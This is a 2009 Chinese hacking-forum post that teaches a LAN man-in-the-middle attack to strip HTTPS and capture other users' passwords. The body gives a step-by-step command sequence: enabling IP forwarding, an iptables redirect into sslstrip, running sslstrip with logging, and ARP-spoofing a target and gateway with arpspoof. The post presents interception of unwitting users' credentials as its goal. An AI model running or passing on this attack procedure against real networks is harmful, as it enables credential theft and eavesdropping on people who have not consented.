找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 832|回复: 0

运用sslstrip进行中间人攻击(Bypass https)

[复制链接]

97

主题

1

回帖

207

牛毛

一级牛人

延边IDC数据中心

积分
207
发表于 2009-5-30 14:34:29 | 显示全部楼层 |阅读模式 来自 吉林省延边州
邪八新人第一帖! 这是我以前在anywlan发过的一帖子, 现转到这来测试下! 要是发错地方请指正.

大家都知在内网进行中间人攻击可以使得攻击者更有效地截获内网用户的密码及隐秘信息。在BackTrack环境下使用EtterCap or ArpSpoof工具即可. 但Ettercap支持的协议中, 仅对HTTP、FTP、Telnet、SMTP等以明文传输的协议有效. 对HTTPS这样用了OpenSSL的就没办法了..... 直到刚在US举行的black hat 2009会上,一老黑发布的名为sslstrip的software,变像的解决了此问题.

此软件可在(http://www.thoughtcrime.org/software/sslstrip/index.html)找到. E文ok的朋友还可以看他在Black hat上的精彩演讲. 因sslstrip是用python写成,不用安装也可运行.

用法分为以下几步:

1) 用命令 echo "1" > /proc/sys/net/ipv4/ip_forward 将你的机子进入forwarding mode.

2) 用命令 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10***00 使iptables把所有http数据导入sslstrip.

3) 运行 sslstrip -a -w ssllog (写入文本)

4) 运行 arpspoof -i eth0 -t 192.168.1.15 (目标) 192.168.1.1 (网关)

接下来就耐心等待吧! ;) 要提下的是生成的log文件如ssllog其实是html格式的.用konquer可以打开,这样连目标在看的网页面也一清二楚了. 以上均在自个的LAN和BT3下测试完成. 此文是小弟头一回发贴,有不对之处还请大狭们都指正!
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-30 17:07 , Processed in 0.155119 second(s), 33 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表